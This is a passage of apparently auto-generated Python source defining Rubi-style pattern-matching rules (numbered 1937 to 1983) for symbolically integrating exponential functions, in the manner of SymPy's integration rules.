rule1937 = ReplacementRule(pattern1937, replacement1937)
pattern1938 = Pattern(Integral(F_**((x_*WC('d', S(1)) + WC('c', S(0)))**n_*WC('b', S(1)) + WC('a', S(0)))*(x_*WC('d', S(1)) + WC('c', S(0)))**WC('m', S(1)), x_), cons1099, cons2, cons3, cons7, cons27, cons31, cons1118, cons1121, cons85, cons1122)
def replacement1938(m, b, d, c, a, n, x, F):
rubi.append(1938)
return -Dist(b*n*log(F)/(m + S(1)), Int(F**(a + b*(c + d*x)**n)*(c + d*x)**(m + n), x), x) + Simp(F**(a + b*(c + d*x)**n)*(c + d*x)**(m + S(1))/(d*(m + S(1))), x)
rule1938 = ReplacementRule(pattern1938, replacement1938)
pattern1939 = Pattern(Integral(F_**((x_*WC('d', S(1)) + WC('c', S(0)))**n_*WC('b', S(1)) + WC('a', S(0)))*(x_*WC('d', S(1)) + WC('c', S(0)))**WC('m', S(1)), x_), cons1099, cons2, cons3, cons7, cons27, cons21, cons4, cons1118, cons1121, cons356, cons535)
def replacement1939(m, b, d, c, a, n, x, F):
rubi.append(1939)
return -Dist(b*n*log(F)/(m + S(1)), Int(F**(a + b*(c + d*x)**n)*(c + d*x)**(m + n), x), x) + Simp(F**(a + b*(c + d*x)**n)*(c + d*x)**(m + S(1))/(d*(m + S(1))), x)
rule1939 = ReplacementRule(pattern1939, replacement1939)
def With1940(m, b, d, c, a, n, x, F):
k = Denominator(n)
rubi.append(1940)
return Dist(k/d, Subst(Int(F**(a + b*x**(k*n))*x**(k*(m + S(1)) + S(-1)), x), x, (c + d*x)**(S(1)/k)), x)
pattern1940 = Pattern(Integral(F_**((x_*WC('d', S(1)) + WC('c', S(0)))**n_*WC('b', S(1)) + WC('a', S(0)))*(x_*WC('d', S(1)) + WC('c', S(0)))**WC('m', S(1)), x_), cons1099, cons2, cons3, cons7, cons27, cons93, cons1118, cons1119, cons23)
rule1940 = ReplacementRule(pattern1940, With1940)
pattern1941 = Pattern(Integral(F_**((x_*WC('d', S(1)) + WC('c', S(0)))**n_*WC('b', S(1)) + WC('a', S(0)))*(x_*WC('f', S(1)) + WC('e', S(0)))**WC('m', S(1)), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons21, cons4, cons1116, cons1118, cons1123, cons18, cons1124)
def replacement1941(m, f, b, d, c, a, n, x, F, e):
rubi.append(1941)
return Dist((c + d*x)**(-m)*(e + f*x)**m, Int(F**(a + b*(c + d*x)**n)*(c + d*x)**m, x), x)
rule1941 = ReplacementRule(pattern1941, replacement1941)
pattern1942 = Pattern(Integral(F_**((x_*WC('d', S(1)) + WC('c', S(0)))**n_*WC('b', S(1)) + WC('a', S(0)))*(x_*WC('f', S(1)) + WC('e', S(0)))**WC('m', S(1)), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons21, cons4, cons1116)
def replacement1942(m, f, b, d, c, a, n, x, F, e):
rubi.append(1942)
return -Simp(F**a*(-b*(c + d*x)**n*log(F))**(-(m + S(1))/n)*(e + f*x)**(m + S(1))*Gamma((m + S(1))/n, -b*(c + d*x)**n*log(F))/(f*n), x)
rule1942 = ReplacementRule(pattern1942, replacement1942)
pattern1943 = Pattern(Integral(F_**((x_*WC('d', S(1)) + WC('c', S(0)))**S(2)*WC('b', S(1)) + WC('a', S(0)))*(x_*WC('f', S(1)) + WC('e', S(0)))**m_, x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons176, cons367, cons166)
def replacement1943(m, f, b, d, c, a, x, F, e):
rubi.append(1943)
return Dist((-c*f + d*e)/d, Int(F**(a + b*(c + d*x)**S(2))*(e + f*x)**(m + S(-1)), x), x) - Dist(f**S(2)*(m + S(-1))/(S(2)*b*d**S(2)*log(F)), Int(F**(a + b*(c + d*x)**S(2))*(e + f*x)**(m + S(-2)), x), x) + Simp(F**(a + b*(c + d*x)**S(2))*f*(e + f*x)**(m + S(-1))/(S(2)*b*d**S(2)*log(F)), x)
rule1943 = ReplacementRule(pattern1943, replacement1943)
pattern1944 = Pattern(Integral(F_**((x_*WC('d', S(1)) + WC('c', S(0)))**S(2)*WC('b', S(1)) + WC('a', S(0)))*(x_*WC('f', S(1)) + WC('e', S(0)))**m_, x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons176, cons31, cons94)
def replacement1944(m, f, b, d, c, a, x, F, e):
rubi.append(1944)
return -Dist(S(2)*b*d**S(2)*log(F)/(f**S(2)*(m + S(1))), Int(F**(a + b*(c + d*x)**S(2))*(e + f*x)**(m + S(2)), x), x) + Dist(S(2)*b*d*(-c*f + d*e)*log(F)/(f**S(2)*(m + S(1))), Int(F**(a + b*(c + d*x)**S(2))*(e + f*x)**(m + S(1)), x), x) + Simp(F**(a + b*(c + d*x)**S(2))*(e + f*x)**(m + S(1))/(f*(m + S(1))), x)
rule1944 = ReplacementRule(pattern1944, replacement1944)
pattern1945 = Pattern(Integral(F_**((x_*WC('d', S(1)) + WC('c', S(0)))**n_*WC('b', S(1)) + WC('a', S(0)))*(x_*WC('f', S(1)) + WC('e', S(0)))**m_, x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons176, cons85, cons744, cons31, cons94)
def replacement1945(m, f, b, d, c, a, n, x, F, e):
rubi.append(1945)
return -Dist(b*d*n*log(F)/(f*(m + S(1))), Int(F**(a + b*(c + d*x)**n)*(c + d*x)**(n + S(-1))*(e + f*x)**(m + S(1)), x), x) + Simp(F**(a + b*(c + d*x)**n)*(e + f*x)**(m + S(1))/(f*(m + S(1))), x)
rule1945 = ReplacementRule(pattern1945, replacement1945)
pattern1946 = Pattern(Integral(F_**(WC('a', S(0)) + WC('b', S(1))/(x_*WC('d', S(1)) + WC('c', S(0))))/(x_*WC('f', S(1)) + WC('e', S(0))), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons176)
def replacement1946(f, b, d, c, a, x, F, e):
rubi.append(1946)
return Dist(d/f, Int(F**(a + b/(c + d*x))/(c + d*x), x), x) - Dist((-c*f + d*e)/f, Int(F**(a + b/(c + d*x))/((c + d*x)*(e + f*x)), x), x)
rule1946 = ReplacementRule(pattern1946, replacement1946)
pattern1947 = Pattern(Integral(F_**(WC('a', S(0)) + WC('b', S(1))/(x_*WC('d', S(1)) + WC('c', S(0))))*(x_*WC('f', S(1)) + WC('e', S(0)))**m_, x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons176, cons17, cons94)
def replacement1947(m, f, b, d, c, a, x, F, e):
rubi.append(1947)
return Dist(b*d*log(F)/(f*(m + S(1))), Int(F**(a + b/(c + d*x))*(e + f*x)**(m + S(1))/(c + d*x)**S(2), x), x) + Simp(F**(a + b/(c + d*x))*(e + f*x)**(m + S(1))/(f*(m + S(1))), x)
rule1947 = ReplacementRule(pattern1947, replacement1947)
pattern1948 = Pattern(Integral(F_**((x_*WC('d', S(1)) + WC('c', S(0)))**n_*WC('b', S(1)) + WC('a', S(0)))/(x_*WC('f', S(1)) + WC('e', S(0))), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons4, cons176)
def replacement1948(f, b, d, c, a, n, x, F, e):
rubi.append(1948)
return Int(F**(a + b*(c + d*x)**n)/(e + f*x), x)
rule1948 = ReplacementRule(pattern1948, replacement1948)
pattern1949 = Pattern(Integral(F_**v_*u_**WC('m', S(1)), x_), cons1099, cons21, cons68, cons840, cons1125)
def replacement1949(v, u, m, x, F):
rubi.append(1949)
return Int(F**ExpandToSum(v, x)*ExpandToSum(u, x)**m, x)
rule1949 = ReplacementRule(pattern1949, replacement1949)
pattern1950 = Pattern(Integral(F_**((x_*WC('d', S(1)) + WC('c', S(0)))**n_*WC('b', S(1)) + WC('a', S(0)))*u_, x_), cons1099, cons2, cons3, cons7, cons27, cons4, cons804)
def replacement1950(u, b, d, c, a, n, x, F):
rubi.append(1950)
return Int(ExpandLinearProduct(F**(a + b*(c + d*x)**n), u, c, d, x), x)
rule1950 = ReplacementRule(pattern1950, replacement1950)
pattern1951 = Pattern(Integral(F_**(v_*WC('b', S(1)) + WC('a', S(0)))*WC('u', S(1)), x_), cons1099, cons2, cons3, cons804, cons1126, cons1127)
def replacement1951(v, u, b, a, x, F):
rubi.append(1951)
return Int(F**(a + b*NormalizePowerOfLinear(v, x))*u, x)
rule1951 = ReplacementRule(pattern1951, replacement1951)
pattern1952 = Pattern(Integral(F_**(WC('a', S(0)) + WC('b', S(1))/(x_*WC('d', S(1)) + WC('c', S(0))))/((x_*WC('f', S(1)) + WC('e', S(0)))*(x_*WC('h', S(1)) + WC('g', S(0)))), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons1116)
def replacement1952(f, b, g, d, c, a, x, h, F, e):
rubi.append(1952)
return -Dist(d/(f*(-c*h + d*g)), Subst(Int(F**(a + b*d*x/(-c*h + d*g) - b*h/(-c*h + d*g))/x, x), x, (g + h*x)/(c + d*x)), x)
rule1952 = ReplacementRule(pattern1952, replacement1952)
pattern1953 = Pattern(Integral(F_**((x_*WC('b', S(1)) + WC('a', S(0)))*WC('f', S(1))/(x_*WC('d', S(1)) + WC('c', S(0))) + WC('e', S(0)))*(x_*WC('h', S(1)) + WC('g', S(0)))**WC('m', S(1)), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons209, cons21, cons25)
def replacement1953(m, f, b, g, d, c, a, x, h, F, e):
rubi.append(1953)
return Dist(F**(b*f/d + e), Int((g + h*x)**m, x), x)
rule1953 = ReplacementRule(pattern1953, replacement1953)
pattern1954 = Pattern(Integral(F_**((x_*WC('b', S(1)) + WC('a', S(0)))*WC('f', S(1))/(x_*WC('d', S(1)) + WC('c', S(0))) + WC('e', S(0)))*(x_*WC('h', S(1)) + WC('g', S(0)))**WC('m', S(1)), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons209, cons21, cons71, cons1128)
def replacement1954(m, f, b, g, d, c, a, x, h, F, e):
rubi.append(1954)
return Int(F**(-f*(-a*d + b*c)/(d*(c + d*x)) + (b*f + d*e)/d)*(g + h*x)**m, x)
rule1954 = ReplacementRule(pattern1954, replacement1954)
pattern1955 = Pattern(Integral(F_**((x_*WC('b', S(1)) + WC('a', S(0)))*WC('f', S(1))/(x_*WC('d', S(1)) + WC('c', S(0))) + WC('e', S(0)))/(x_*WC('h', S(1)) + WC('g', S(0))), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons209, cons71, cons1129)
def replacement1955(f, b, g, d, c, a, x, h, F, e):
rubi.append(1955)
return Dist(d/h, Int(F**(e + f*(a + b*x)/(c + d*x))/(c + d*x), x), x) - Dist((-c*h + d*g)/h, Int(F**(e + f*(a + b*x)/(c + d*x))/((c + d*x)*(g + h*x)), x), x)
rule1955 = ReplacementRule(pattern1955, replacement1955)
pattern1956 = Pattern(Integral(F_**((x_*WC('b', S(1)) + WC('a', S(0)))*WC('f', S(1))/(x_*WC('d', S(1)) + WC('c', S(0))) + WC('e', S(0)))*(x_*WC('h', S(1)) + WC('g', S(0)))**m_, x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons209, cons71, cons1129, cons17, cons94)
def replacement1956(m, f, b, g, d, c, a, x, h, F, e):
rubi.append(1956)
return -Dist(f*(-a*d + b*c)*log(F)/(h*(m + S(1))), Int(F**(e + f*(a + b*x)/(c + d*x))*(g + h*x)**(m + S(1))/(c + d*x)**S(2), x), x) + Simp(F**(e + f*(a + b*x)/(c + d*x))*(g + h*x)**(m + S(1))/(h*(m + S(1))), x)
rule1956 = ReplacementRule(pattern1956, replacement1956)
pattern1957 = Pattern(Integral(F_**((x_*WC('b', S(1)) + WC('a', S(0)))*WC('f', S(1))/(x_*WC('d', S(1)) + WC('c', S(0))) + WC('e', S(0)))/((x_*WC('h', S(1)) + WC('g', S(0)))*(x_*WC('j', S(1)) + WC('i', S(0)))), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons209, cons1128)
def replacement1957(j, f, b, g, i, d, c, a, x, h, F, e):
rubi.append(1957)
return -Dist(d/(h*(-c*j + d*i)), Subst(Int(F**(e - f*x*(-a*d + b*c)/(-c*j + d*i) + f*(-a*j + b*i)/(-c*j + d*i))/x, x), x, (i + j*x)/(c + d*x)), x)
rule1957 = ReplacementRule(pattern1957, replacement1957)
pattern1958 = Pattern(Integral(F_**(x_**S(2)*WC('c', S(1)) + x_*WC('b', S(1)) + WC('a', S(0))), x_), cons1099, cons2, cons3, cons7, cons1130)
def replacement1958(b, c, a, x, F):
rubi.append(1958)
return Dist(F**(a - b**S(2)/(S(4)*c)), Int(F**((b + S(2)*c*x)**S(2)/(S(4)*c)), x), x)
rule1958 = ReplacementRule(pattern1958, replacement1958)
pattern1959 = Pattern(Integral(F_**v_, x_), cons1099, cons818, cons1131)
def replacement1959(v, x, F):
rubi.append(1959)
return Int(F**ExpandToSum(v, x), x)
rule1959 = ReplacementRule(pattern1959, replacement1959)
pattern1960 = Pattern(Integral(F_**(x_**S(2)*WC('c', S(1)) + x_*WC('b', S(1)) + WC('a', S(0)))*(x_*WC('e', S(1)) + WC('d', S(0))), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons1132)
def replacement1960(b, d, c, a, x, F, e):
rubi.append(1960)
return Simp(F**(a + b*x + c*x**S(2))*e/(S(2)*c*log(F)), x)
rule1960 = ReplacementRule(pattern1960, replacement1960)
pattern1961 = Pattern(Integral(F_**(x_**S(2)*WC('c', S(1)) + x_*WC('b', S(1)) + WC('a', S(0)))*(x_*WC('e', S(1)) + WC('d', S(0)))**m_, x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons1132, cons31, cons166)
def replacement1961(m, b, d, c, a, x, F, e):
rubi.append(1961)
return -Dist(e**S(2)*(m + S(-1))/(S(2)*c*log(F)), Int(F**(a + b*x + c*x**S(2))*(d + e*x)**(m + S(-2)), x), x) + Simp(F**(a + b*x + c*x**S(2))*e*(d + e*x)**(m + S(-1))/(S(2)*c*log(F)), x)
rule1961 = ReplacementRule(pattern1961, replacement1961)
pattern1962 = Pattern(Integral(F_**(x_**S(2)*WC('c', S(1)) + x_*WC('b', S(1)) + WC('a', S(0)))/(x_*WC('e', S(1)) + WC('d', S(0))), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons1132)
def replacement1962(b, d, c, a, x, F, e):
rubi.append(1962)
return Simp(F**(a - b**S(2)/(S(4)*c))*ExpIntegralEi((b + S(2)*c*x)**S(2)*log(F)/(S(4)*c))/(S(2)*e), x)
rule1962 = ReplacementRule(pattern1962, replacement1962)
pattern1963 = Pattern(Integral(F_**(x_**S(2)*WC('c', S(1)) + x_*WC('b', S(1)) + WC('a', S(0)))*(x_*WC('e', S(1)) + WC('d', S(0)))**m_, x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons1132, cons31, cons94)
def replacement1963(m, b, d, c, a, x, F, e):
rubi.append(1963)
return -Dist(S(2)*c*log(F)/(e**S(2)*(m + S(1))), Int(F**(a + b*x + c*x**S(2))*(d + e*x)**(m + S(2)), x), x) + Simp(F**(a + b*x + c*x**S(2))*(d + e*x)**(m + S(1))/(e*(m + S(1))), x)
rule1963 = ReplacementRule(pattern1963, replacement1963)
pattern1964 = Pattern(Integral(F_**(x_**S(2)*WC('c', S(1)) + x_*WC('b', S(1)) + WC('a', S(0)))*(x_*WC('e', S(1)) + WC('d', S(0))), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons1133)
def replacement1964(b, d, c, a, x, F, e):
rubi.append(1964)
return -Dist((b*e - S(2)*c*d)/(S(2)*c), Int(F**(a + b*x + c*x**S(2)), x), x) + Simp(F**(a + b*x + c*x**S(2))*e/(S(2)*c*log(F)), x)
rule1964 = ReplacementRule(pattern1964, replacement1964)
pattern1965 = Pattern(Integral(F_**(x_**S(2)*WC('c', S(1)) + x_*WC('b', S(1)) + WC('a', S(0)))*(x_*WC('e', S(1)) + WC('d', S(0)))**m_, x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons1133, cons31, cons166)
def replacement1965(m, b, d, c, a, x, F, e):
rubi.append(1965)
return -Dist((b*e - S(2)*c*d)/(S(2)*c), Int(F**(a + b*x + c*x**S(2))*(d + e*x)**(m + S(-1)), x), x) - Dist(e**S(2)*(m + S(-1))/(S(2)*c*log(F)), Int(F**(a + b*x + c*x**S(2))*(d + e*x)**(m + S(-2)), x), x) + Simp(F**(a + b*x + c*x**S(2))*e*(d + e*x)**(m + S(-1))/(S(2)*c*log(F)), x)
rule1965 = ReplacementRule(pattern1965, replacement1965)
pattern1966 = Pattern(Integral(F_**(x_**S(2)*WC('c', S(1)) + x_*WC('b', S(1)) + WC('a', S(0)))*(x_*WC('e', S(1)) + WC('d', S(0)))**m_, x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons1133, cons31, cons94)
def replacement1966(m, b, d, c, a, x, F, e):
rubi.append(1966)
return -Dist(S(2)*c*log(F)/(e**S(2)*(m + S(1))), Int(F**(a + b*x + c*x**S(2))*(d + e*x)**(m + S(2)), x), x) - Dist((b*e - S(2)*c*d)*log(F)/(e**S(2)*(m + S(1))), Int(F**(a + b*x + c*x**S(2))*(d + e*x)**(m + S(1)), x), x) + Simp(F**(a + b*x + c*x**S(2))*(d + e*x)**(m + S(1))/(e*(m + S(1))), x)
rule1966 = ReplacementRule(pattern1966, replacement1966)
pattern1967 = Pattern(Integral(F_**(x_**S(2)*WC('c', S(1)) + x_*WC('b', S(1)) + WC('a', S(0)))*(x_*WC('e', S(1)) + WC('d', S(0)))**WC('m', S(1)), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons21, cons1134)
def replacement1967(m, b, d, c, a, x, F, e):
rubi.append(1967)
return Int(F**(a + b*x + c*x**S(2))*(d + e*x)**m, x)
rule1967 = ReplacementRule(pattern1967, replacement1967)
pattern1968 = Pattern(Integral(F_**v_*u_**WC('m', S(1)), x_), cons1099, cons21, cons68, cons818, cons819)
def replacement1968(v, u, m, x, F):
rubi.append(1968)
return Int(F**ExpandToSum(v, x)*ExpandToSum(u, x)**m, x)
rule1968 = ReplacementRule(pattern1968, replacement1968)
def With1969(v, m, b, d, c, a, n, x, F, e):
u = IntHide(F**(e*(c + d*x))*(F**v*b + a)**n, x)
rubi.append(1969)
return -Dist(m, Int(u*x**(m + S(-1)), x), x) + Dist(x**m, u, x)
pattern1969 = Pattern(Integral(F_**((x_*WC('d', S(1)) + WC('c', S(0)))*WC('e', S(1)))*x_**WC('m', S(1))*(F_**v_*WC('b', S(1)) + WC('a', S(0)))**n_, x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons1135, cons31, cons168, cons196)
rule1969 = ReplacementRule(pattern1969, With1969)
def With1970(f, b, g, G, d, c, n, a, x, h, F, e):
if isinstance(x, (int, Integer, float, Float)):
return False
m = FullSimplify(g*h*log(G)/(d*e*log(F)))
if And(RationalQ(m), GreaterEqual(Abs(m), S(1))):
return True
return False
pattern1970 = Pattern(Integral(G_**((x_*WC('g', S(1)) + WC('f', S(0)))*WC('h', S(1)))*(F_**((x_*WC('d', S(1)) + WC('c', S(0)))*WC('e', S(1)))*WC('b', S(1)) + a_)**WC('n', S(1)), x_), cons1099, cons1137, cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons209, cons4, cons1136, CustomConstraint(With1970))
def replacement1970(f, b, g, G, d, c, n, a, x, h, F, e):
m = FullSimplify(g*h*log(G)/(d*e*log(F)))
rubi.append(1970)
return Dist(G**(-c*g*h/d + f*h)*Denominator(m)/(d*e*log(F)), Subst(Int(x**(Numerator(m) + S(-1))*(a + b*x**Denominator(m))**n, x), x, F**(e*(c + d*x)/Denominator(m))), x)
rule1970 = ReplacementRule(pattern1970, replacement1970)
def With1971(f, b, g, G, d, c, n, a, x, h, F, e):
if isinstance(x, (int, Integer, float, Float)):
return False
m = FullSimplify(d*e*log(F)/(g*h*log(G)))
if And(RationalQ(m), Greater(Abs(m), S(1))):
return True
return False
pattern1971 = Pattern(Integral(G_**((x_*WC('g', S(1)) + WC('f', S(0)))*WC('h', S(1)))*(F_**((x_*WC('d', S(1)) + WC('c', S(0)))*WC('e', S(1)))*WC('b', S(1)) + a_)**WC('n', S(1)), x_), cons1099, cons1137, cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons209, cons4, cons1136, CustomConstraint(With1971))
def replacement1971(f, b, g, G, d, c, n, a, x, h, F, e):
m = FullSimplify(d*e*log(F)/(g*h*log(G)))
rubi.append(1971)
return Dist(Denominator(m)/(g*h*log(G)), Subst(Int(x**(Denominator(m) + S(-1))*(F**(c*e - d*e*f/g)*b*x**Numerator(m) + a)**n, x), x, G**(h*(f + g*x)/Denominator(m))), x)
rule1971 = ReplacementRule(pattern1971, replacement1971)
pattern1972 = Pattern(Integral(G_**((x_*WC('g', S(1)) + WC('f', S(0)))*WC('h', S(1)))*(F_**((x_*WC('d', S(1)) + WC('c', S(0)))*WC('e', S(1)))*WC('b', S(1)) + a_)**WC('n', S(1)), x_), cons1099, cons1137, cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons209, cons1138, cons148)
def replacement1972(f, b, g, G, d, c, n, a, x, h, F, e):
rubi.append(1972)
return Int(G**(f*h)*G**(g*h*x)*(F**(c*e)*F**(d*e*x)*b + a)**n, x)
rule1972 = ReplacementRule(pattern1972, replacement1972)
pattern1973 = Pattern(Integral(G_**((x_*WC('g', S(1)) + WC('f', S(0)))*WC('h', S(1)))*(F_**((x_*WC('d', S(1)) + WC('c', S(0)))*WC('e', S(1)))*WC('b', S(1)) + a_)**n_, x_), cons1099, cons1137, cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons209, cons1138, cons196)
def replacement1973(f, b, g, G, d, c, a, n, x, h, F, e):
rubi.append(1973)
return Simp(G**(h*(f + g*x))*a**n*Hypergeometric2F1(-n, g*h*log(G)/(d*e*log(F)), S(1) + g*h*log(G)/(d*e*log(F)), -F**(e*(c + d*x))*b/a)/(g*h*log(G)), x)
rule1973 = ReplacementRule(pattern1973, replacement1973)
pattern1974 = Pattern(Integral(G_**((x_*WC('g', S(1)) + WC('f', S(0)))*WC('h', S(1)))*(F_**((x_*WC('d', S(1)) + WC('c', S(0)))*WC('e', S(1)))*WC('b', S(1)) + a_)**n_, x_), cons1099, cons1137, cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons209, cons4, cons1138, cons23)
def replacement1974(f, b, g, G, d, c, a, n, x, h, F, e):
rubi.append(1974)
return Simp(G**(h*(f + g*x))*(F**(e*(c + d*x))*b + a)**(n + S(1))*Hypergeometric2F1(S(1), n + S(1) + g*h*log(G)/(d*e*log(F)), S(1) + g*h*log(G)/(d*e*log(F)), -F**(e*(c + d*x))*b/a)/(a*g*h*log(G)), x)
rule1974 = ReplacementRule(pattern1974, replacement1974)
pattern1975 = Pattern(Integral(G_**(u_*WC('h', S(1)))*(F_**(v_*WC('e', S(1)))*WC('b', S(1)) + a_)**n_, x_), cons1099, cons1137, cons2, cons3, cons48, cons209, cons4, cons810, cons811)
def replacement1975(v, u, b, G, a, n, x, h, F, e):
rubi.append(1975)
return Int(G**(h*ExpandToSum(u, x))*(F**(e*ExpandToSum(v, x))*b + a)**n, x)
rule1975 = ReplacementRule(pattern1975, replacement1975)
def With1976(t, f, b, g, r, G, d, c, n, a, H, x, h, s, e, F):
if isinstance(x, (int, Integer, float, Float)):
return False
m = FullSimplify((g*h*log(G) + s*t*log(H))/(d*e*log(F)))
if RationalQ(m):
return True
return False
pattern1976 = Pattern(Integral(G_**((x_*WC('g', S(1)) + WC('f', S(0)))*WC('h', S(1)))*H_**((x_*WC('s', S(1)) + WC('r', S(0)))*WC('t', S(1)))*(F_**((x_*WC('d', S(1)) + WC('c', S(0)))*WC('e', S(1)))*WC('b', S(1)) + a_)**WC('n', S(1)), x_), cons1099, cons1137, cons1140, cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons209, cons52, cons800, cons1141, cons4, cons1139, CustomConstraint(With1976))
def replacement1976(t, f, b, g, r, G, d, c, n, a, H, x, h, s, e, F):
m = FullSimplify((g*h*log(G) + s*t*log(H))/(d*e*log(F)))
rubi.append(1976)
return Dist(G**(-c*g*h/d + f*h)*H**(-c*s*t/d + r*t)*Denominator(m)/(d*e*log(F)), Subst(Int(x**(Numerator(m) + S(-1))*(a + b*x**Denominator(m))**n, x), x, F**(e*(c + d*x)/Denominator(m))), x)
rule1976 = ReplacementRule(pattern1976, replacement1976)
pattern1977 = Pattern(Integral(G_**((x_*WC('g', S(1)) + WC('f', S(0)))*WC('h', S(1)))*H_**((x_*WC('s', S(1)) + WC('r', S(0)))*WC('t', S(1)))*(F_**((x_*WC('d', S(1)) + WC('c', S(0)))*WC('e', S(1)))*WC('b', S(1)) + a_)**WC('n', S(1)), x_), cons1099, cons1137, cons1140, cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons209, cons52, cons800, cons1141, cons1142, cons85)
def replacement1977(t, f, b, g, r, G, d, c, n, a, H, x, h, s, e, F):
rubi.append(1977)
return Dist(G**(h*(-c*g/d + f)), Int(H**(t*(r + s*x))*(b + F**(-e*(c + d*x))*a)**n, x), x)
rule1977 = ReplacementRule(pattern1977, replacement1977)
pattern1978 = Pattern(Integral(G_**((x_*WC('g', S(1)) + WC('f', S(0)))*WC('h', S(1)))*H_**((x_*WC('s', S(1)) + WC('r', S(0)))*WC('t', S(1)))*(F_**((x_*WC('d', S(1)) + WC('c', S(0)))*WC('e', S(1)))*WC('b', S(1)) + a_)**WC('n', S(1)), x_), cons1099, cons1137, cons1140, cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons209, cons52, cons800, cons1141, cons1143, cons148)
def replacement1978(t, f, b, g, r, G, d, c, n, a, H, x, h, s, e, F):
rubi.append(1978)
return Int(G**(f*h)*G**(g*h*x)*H**(r*t)*H**(s*t*x)*(F**(c*e)*F**(d*e*x)*b + a)**n, x)
rule1978 = ReplacementRule(pattern1978, replacement1978)
pattern1979 = Pattern(Integral(G_**((x_*WC('g', S(1)) + WC('f', S(0)))*WC('h', S(1)))*H_**((x_*WC('s', S(1)) + WC('r', S(0)))*WC('t', S(1)))*(F_**((x_*WC('d', S(1)) + WC('c', S(0)))*WC('e', S(1)))*WC('b', S(1)) + a_)**n_, x_), cons1099, cons1137, cons1140, cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons209, cons52, cons800, cons1141, cons1143, cons196)
def replacement1979(t, f, b, g, r, G, d, c, a, n, H, x, h, s, e, F):
rubi.append(1979)
return Simp(G**(h*(f + g*x))*H**(t*(r + s*x))*a**n*Hypergeometric2F1(-n, (g*h*log(G) + s*t*log(H))/(d*e*log(F)), S(1) + (g*h*log(G) + s*t*log(H))/(d*e*log(F)), -F**(e*(c + d*x))*b/a)/(g*h*log(G) + s*t*log(H)), x)
rule1979 = ReplacementRule(pattern1979, replacement1979)
pattern1980 = Pattern(Integral(G_**((x_*WC('g', S(1)) + WC('f', S(0)))*WC('h', S(1)))*H_**((x_*WC('s', S(1)) + WC('r', S(0)))*WC('t', S(1)))*(F_**((x_*WC('d', S(1)) + WC('c', S(0)))*WC('e', S(1)))*WC('b', S(1)) + a_)**n_, x_), cons1099, cons1137, cons1140, cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons209, cons52, cons800, cons1141, cons4, cons1143, cons23)
def replacement1980(t, f, b, g, r, G, d, c, a, n, H, x, h, s, e, F):
rubi.append(1980)
return Simp(G**(h*(f + g*x))*H**(t*(r + s*x))*((F**(e*(c + d*x))*b + a)/a)**(-n)*(F**(e*(c + d*x))*b + a)**n*Hypergeometric2F1(-n, (g*h*log(G) + s*t*log(H))/(d*e*log(F)), S(1) + (g*h*log(G) + s*t*log(H))/(d*e*log(F)), -F**(e*(c + d*x))*b/a)/(g*h*log(G) + s*t*log(H)), x)
rule1980 = ReplacementRule(pattern1980, replacement1980)
pattern1981 = Pattern(Integral(G_**(u_*WC('h', S(1)))*H_**(w_*WC('t', S(1)))*(F_**(v_*WC('e', S(1)))*WC('b', S(1)) + a_)**n_, x_), cons1099, cons1137, cons1140, cons2, cons3, cons48, cons209, cons1141, cons4, cons812, cons813)
def replacement1981(v, w, u, t, b, G, a, n, H, x, h, F, e):
rubi.append(1981)
return Int(G**(h*ExpandToSum(u, x))*H**(t*ExpandToSum(w, x))*(F**(e*ExpandToSum(v, x))*b + a)**n, x)
rule1981 = ReplacementRule(pattern1981, replacement1981)
pattern1982 = Pattern(Integral(F_**((x_*WC('d', S(1)) + WC('c', S(0)))*WC('e', S(1)))*(F_**((x_*WC('d', S(1)) + WC('c', S(0)))*WC('e', S(1)))*WC('b', S(1)) + x_**WC('n', S(1))*WC('a', S(1)))**WC('p', S(1)), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons4, cons5, cons54)
def replacement1982(p, b, d, c, a, n, x, F, e):
rubi.append(1982)
return -Dist(a*n/(b*d*e*log(F)), Int(x**(n + S(-1))*(F**(e*(c + d*x))*b + a*x**n)**p, x), x) + Simp((F**(e*(c + d*x))*b + a*x**n)**(p + S(1))/(b*d*e*(p + S(1))*log(F)), x)
rule1982 = ReplacementRule(pattern1982, replacement1982)
pattern1983 = Pattern(Integral(F_**((x_*WC('d', S(1)) + WC('c', S(0)))*WC('e', S(1)))*x_**WC('m', S(1))*(F_**((x_*WC('d', S(1)) + WC('c', S(0)))*WC('e', S(1)))*WC('b', S(1)) + x_**WC('n', S(1))*WC('a', S(1)))**WC('p', S(1)), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons21, cons4, cons5, cons54)
def replacement1983(p, m, b, d, c, a, n, x, F, e):
rubi.append(1983)
